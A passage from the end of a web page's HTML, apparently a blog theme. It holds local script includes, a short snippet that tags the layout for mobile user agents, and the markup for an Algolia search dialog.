src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>